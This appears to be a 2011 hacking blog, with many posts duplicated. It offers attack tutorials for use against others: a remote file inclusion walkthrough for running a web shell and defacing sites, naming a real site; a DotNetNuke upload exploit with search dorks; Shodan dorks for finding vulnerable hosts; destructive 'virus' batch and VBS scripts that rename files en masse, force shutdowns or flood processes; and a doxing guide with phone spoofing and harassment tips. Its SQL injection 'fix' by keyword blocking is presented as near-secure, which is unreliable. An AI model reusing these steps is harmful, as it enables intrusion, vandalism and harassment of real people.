<?php
$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . $_GET['id']);
echo($display);
echo($display);
?>
This means that we are selecting the page content ‘text’ from ‘pages’ in the SQL database, and we are selecting the right page content with $_GET['id'] and $_GET['id'] is the thing in the url , for examplehttp://target.com/index.php?id=21
The above code is easily injectable and is enough for an attacker to enter your site without proper authentication.
But if we replace above code with the code written below then i guess we are 99.9% secure :P
<?php
$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . mysql_real_escape_string($_GET['id']));
echo($display);
echo($display);
?>
In above code mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " . This function must always be used to make data safe before sending a query to MySQL.Alternatively we can check $_GET['id'] for illegal and unwanted characters like this :
<?php
$inject = strrpos(strtolower($_GET['id']), “union”);
if ($inject === false){}else
{
die;
}
if ($inject === false){}else
{
die;
}
$inject = strrpos(strtolower($_GET['id']), “select”);
if ($inject === false){}else
{
die;
}
if ($inject === false){}else
{
die;
}
$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . $_GET['id']);
echo($display);
?>
Similarly we can block Information_ ,_schema, admin ,order , and other such keywords . :)If we want we can use javascript to block and filter characters . This would be also useful to get rid of basic SQL string injection which is done at login forms.
I hope you like this post :=))
Tuesday, February 1, 2011
Advance search engine for hackers - SHODAN
Hello Guys are you tired of using google dorks to search your target? or you think that it takes time to search for vulnerability because it is hit and trial method :P
Today i am posting about SHODAN search engine . I found it very useful in searching servers , routers , webcam ,ports etc .It finds computer running certain softwares (HTTP,FTP etc) and most interesting it filters hosts based on geographical locations directly.
SHODAN stands for Sentient Hyper-Optimized Data Access Network . It gives more accurate as well as helpful information. If you are really looking for vulnerability then use shodan and google you will feel the difference i am saying this because google looks at the web content only where as, Shodan can show you in plain text the network part of the host.
Here is the websites link http://www.shodanhq.com
eg Let us suppose i want to search for hosts which are running IIS 5 server then my query will be :
http://www.shodanhq.com/?q=iis+5.0
It gives results as:
" HTTP/1.0 403 Forbidden
Content-Length: 1283
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 20:37:47 GMT "
Just like this you will get 1123104 results for iis 5.0.
Today i am posting about SHODAN search engine . I found it very useful in searching servers , routers , webcam ,ports etc .It finds computer running certain softwares (HTTP,FTP etc) and most interesting it filters hosts based on geographical locations directly.
SHODAN stands for Sentient Hyper-Optimized Data Access Network . It gives more accurate as well as helpful information. If you are really looking for vulnerability then use shodan and google you will feel the difference i am saying this because google looks at the web content only where as, Shodan can show you in plain text the network part of the host.
Here is the websites link http://www.shodanhq.com
eg Let us suppose i want to search for hosts which are running IIS 5 server then my query will be :
http://www.shodanhq.com/?q=iis+5.0
It gives results as:
" HTTP/1.0 403 Forbidden
Content-Length: 1283
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 20:37:47 GMT "
Just like this you will get 1123104 results for iis 5.0.
Here i am posting some dorks for SHODAN that will help you to search
http://shodan.surtri.com/?q=cisco-IOS
http://shodan.surtri.com/?q=IIS+4.0
http://shodan.surtri.com/?q=Xerver (REF: http://www.exploit-db.com/exploits/9718)
http://shodan.surtri.com/?q=Fuji+xerox
http://shodan.surtri.com/?q=JetDirect
http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22
http://shodan.surtri.com/?q=port%3A80+iisstart.html
http://shodan.surtri.com/?q=Server:%20SQ-WEBCAM
http://shodan.surtri.com/?q=Netgear
http://shodan.surtri.com/?q=%22Anonymous+access+allowed%22
http://shodan.surtri.com/?q=Golden+FTP+Server
http://shodan.surtri.com/?q=IIS+5.0
http://shodan.surtri.com/?q=IIS+6.0
http://shodan.surtri.com/?q=%22Server%3A+iWeb%22+HTTP
http://shodan.surtri.com/?q=Wordpress
http://shodan.surtri.com/?q=Joomla
http://shodan.surtri.com/?q=Drupal
http://shodan.surtri.com/?q=iPhone+Web+Server
http://shodan.surtri.com/?q=FreeBSD
http://shodan.surtri.com/?q=IPCop
There are more dorks if you need them just send me mail. Now rest things depends on your brain and commonsense . Use your intelligence to use it efficiently.
Happy Searching :=))
Monday, January 31, 2011
RFI (Remote file Inclusion)
Well friends today i am writing about how to hack a website which is RFI vulnerable . RFI means you can upload or link any remote file to the website. If you are lucky enough then you will be able to execute your script as a result you can own that server or you can deface that website completely. If the server is unpatched then it can be exploited using this vulnerability. This method is as powerful as SQL injection and requires a little brain compared to later. So guys lets have a look on how to get a RFI vulnerable site and how to hack it :)
Before going below make sure that you are using strong proxy :P
To find a RFI vulnerable website you can use google dorks. If you need dorks then mail me i'll send you huge list of dorks .
for example :
http://targetsite.com/index.php?page=home
you can easily guess what above url is doing , it simply fetches some text data from server and displaying it in webpage. This is the stage where you need a little brain and your creativity :P
let's say i am changing above url as :
http://targetsite.com/index.php?page=http://www.google.com
If you are redirected to google's page then you got RFI vulnerability is site woooohhhhhhh.....
real example :http://www.cbspk.com/v2/index.php?page=http://www.google.com.
This site is RFI vulnerable but server is patched
Don't get too much excited because now real stuff starts. so keep ypur eyes open.
Now what you all need to do is upload your shell in your server and redirect target site to that shell. If your shell successfully executes then its time to party....now you can handle your target site. If your shell does not executes then dont worry try once more by adding nullbyte , even if u dont succeed try using changing shells extension like shell.php to shell.php;jpg.
NOTE:shell will only execute if server has php support and is unpatched.
Now here you may also need some basic knowledge about bash commands because now days most of the servers are on LINUX.
i wish you happy hacking :=)
Before going below make sure that you are using strong proxy :P
To find a RFI vulnerable website you can use google dorks. If you need dorks then mail me i'll send you huge list of dorks .
for example :
http://targetsite.com/index.php?page=home
you can easily guess what above url is doing , it simply fetches some text data from server and displaying it in webpage. This is the stage where you need a little brain and your creativity :P
let's say i am changing above url as :
http://targetsite.com/index.php?page=http://www.google.com
If you are redirected to google's page then you got RFI vulnerability is site woooohhhhhhh.....
real example :http://www.cbspk.com/v2/index.php?page=http://www.google.com.
This site is RFI vulnerable but server is patched
Don't get too much excited because now real stuff starts. so keep ypur eyes open.
Now what you all need to do is upload your shell in your server and redirect target site to that shell. If your shell successfully executes then its time to party....now you can handle your target site. If your shell does not executes then dont worry try once more by adding nullbyte , even if u dont succeed try using changing shells extension like shell.php to shell.php;jpg.
NOTE:shell will only execute if server has php support and is unpatched.
Now here you may also need some basic knowledge about bash commands because now days most of the servers are on LINUX.
i wish you happy hacking :=)
Sunday, January 30, 2011
Lock folders without any software
Guys this is a cool trick by which we can lock our folder without using any software. All you need to do is copy the code written below and save it as "my folder.bat". You can also make an executable file of this .bat file by using "bat to exe converter". In the code below password is "hackersgallery" you can replace this with your own password . :)
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
set/p "cho=>"
if %cho%==hackersgallery goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==hackersgallery goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Cool Notepad hacks
This will pop up endless notepads until the computer freezes and crashes
Copy the below code in notepad and save it as ".vbs" extension
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
(======================================================)
CAPS LOCK CRAZY TRICK
Copy the below code in notepad and save it as ".vbs" extension
Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
(======================================================)
UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.
Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
(======================================================)
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
(======================================================)
Convey your friend a message and shut down his / her computer:
Save it as "Anything.BAT" in All Files
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
(======================================================)
Disable yor internet temporarily
save it as anything.bat
code :
ipconfig /release
(======================================================)
Copy the text in a notepad and save it as virus.bat
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
(======================================================)
Copy the text in a notepad and save it as virus.vbs
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
(======================================================)
USE TO SWAP MOUSE BUTTONS
copy it and save it as .bat file format
code :
@ echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------
(======================================================)
thanks if you like i'll post some more cool tricks :)
Copy the below code in notepad and save it as ".vbs" extension
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
(======================================================)
CAPS LOCK CRAZY TRICK
Copy the below code in notepad and save it as ".vbs" extension
Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
(======================================================)
UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.
Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
(======================================================)
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
(======================================================)
Convey your friend a message and shut down his / her computer:
Save it as "Anything.BAT" in All Files
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
(======================================================)
Disable yor internet temporarily
save it as anything.bat
code :
ipconfig /release
(======================================================)
Copy the text in a notepad and save it as virus.bat
Dont open file in your own pc
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
(======================================================)
Copy the text in a notepad and save it as virus.vbs
code :
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
(======================================================)
USE TO SWAP MOUSE BUTTONS
copy it and save it as .bat file format
code :
@ echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------
(======================================================)
thanks if you like i'll post some more cool tricks :)
Wednesday, January 26, 2011
Hack a site using DNN
This method is simple but many sites got hacked using this method including gov sites and military sites.
If server is not patched then you can easily upload your shell their and execute that shell as a result you can deface that site. but i recommend you to not deface sites , just use this info for your knowledge.
eg of this attack --> http://www.liadvantage.info/portals/0/hacked_by_00733.jpg
i think u have got.
Before going below make yourself sure that you are using a strong proxy server :|
1st Find The DNN
Go To Any Search Engine
Take Google
And Search This Dork
:inurl:/tabid/36/language/en-US/Defa
OR
Go To Any Search Engine
Take Google
And Search This Dork
:inurl:/tabid/36/language/en-US/Defa
OR
inurl : /portals/0/
See The Results And select any site as target
You Will See This Part In Every Site That You Searched For
/Home/tabid/36/Language/en-US/Default
Now Replace This With
/Providers/HtmlEditorProviders/Fck/f
You Will Enter In The Gallery Page
Now Select
File ( A File On Your Site )
At This Point Copy This Java Script And Paste It In The Address Bar
javascript:__doPostBack('ctlURL$cmdUpload','') {call doPostBack method to upload local files}
You Will Find The Upload Option
Select Root And Upload Your File
Your File Then Will Be In The Root
Then Put This In End Of URL
portals/0/yourfile.yourfile format
Your Done Enjoy !!!
You Will Find The Upload Option
Select Root And Upload Your File
Your File Then Will Be In The Root
Then Put This In End Of URL
portals/0/yourfile.yourfile format
Your Done Enjoy !!!
Tuesday, January 25, 2011
White paper......on server rooting (rooting linux boxes)
Today i am very happy and impressed by my friend's work he has written a paper on how to root linux box. After rooting server you can then own every site of that box.
##################################################################
# Title: Rooting Linux boxes for beginners
# Date : 25 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t[at]yahoo.in
# Official Mail: ShubhaM[at]AcademyOfhacking.com
# Facebook: fb[dot]me/yoShubH
###################################################################
here i am posting direct link to his paper--> http://goo.gl/FmwUY
kudos goes to cyb3r Shubh4m
##################################################################
# Title: Rooting Linux boxes for beginners
# Date : 25 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t[at]yahoo.in
# Official Mail: ShubhaM[at]AcademyOfhacking.com
# Facebook: fb[dot]me/yoShubH
###################################################################
here i am posting direct link to his paper--> http://goo.gl/FmwUY
kudos goes to cyb3r Shubh4m
Doxing Tutorial (Get Personal details)
suppose you want information about someone..
EX:
Name
Relatives
IP
Bio
Location
Profile Links
Email
EX:
Name
Relatives
IP
Bio
Location
Profile Links
And anything else that we could find. But DOXing isn’t all about just writing down information. You sometimes have to use your deductive reasoning to figure things out. The main thing about DOXing is that you want to move pretty fast, but also give yourself some time to look over the information that you’ve gotten. So I’m sure some of you (the new people to this section) are wondering “What are the best sites to find DOX?” well here ya go.
http://www.pipl.com
(Searches for emails, names, usernames, etc.)
(Searches for emails, names, usernames, etc.)
http://www.google.com
(Searches for everything)
(Searches for everything)
Reverse Search for pictures:
http://www.tineye.com
http://www.tineye.com
Reverse area code search:
http://www.telcodata.us/telcodata/telco
http://www.telcodata.us/telcodata/telco
Reverse Phone number search:
http://www.whitepages.com
http://www.411.com
http://www.whitepages.com
http://www.411.com
***Us*** Criminal Record Check:
http://www.criminalsearches.com/
http://www.criminalsearches.com/
Realtor Home search:
http://www.realtor.ca/
http://www.realtor.ca/
Ancestry Search:
http://search.ancestry.com/
http://search.ancestry.com/
Electoral Roll:
Births
Marriages
Deaths
Company Director Addresses
http://www.lookuppeople.co.uk/
Births
Marriages
Deaths
Company Director Addresses
http://www.lookuppeople.co.uk/
Internet Archive:
http://www.archive.org/web/web.php
http://www.archive.org/web/web.php
Reverse IP:
Primary : accurate country/ isp : http://www.whois.sc/iphere
http://www.ipgp.net/
http://www.ip2location.com/free.asp
http://www.ip-adress.com/ip_tracer/
Primary : accurate country/ isp : http://www.whois.sc/iphere
http://www.ipgp.net/
http://www.ip2location.com/free.asp
http://www.ip-adress.com/ip_tracer/
Temporary Mail:
http://www.mailinator.com/
http://www.mailinator.com/
Anonymous email sending:
http://mail.anonymizer.name/
http://www.sendanonymoussms.com/
http://mail.anonymizer.name/
http://www.sendanonymoussms.com/
Secondary people search other then pipl.com
http://www.com.lullar.com
http://www.com.lullar.com
Gather Information on people’s cameras by just uploading an image:
http://regex.info/exif.cgi
http://regex.info/exif.cgi
once the target is accuired send free empty boxes:
http://www.usps.com/
http://www.usps.com/
Telephone Spoofing:
http://www.telespoof.com/freecall/agi
http://www.telespoof.com/freecall/agi
So Easy na............................
there are many other things to do....................:)
Subscribe to:
Posts (Atom)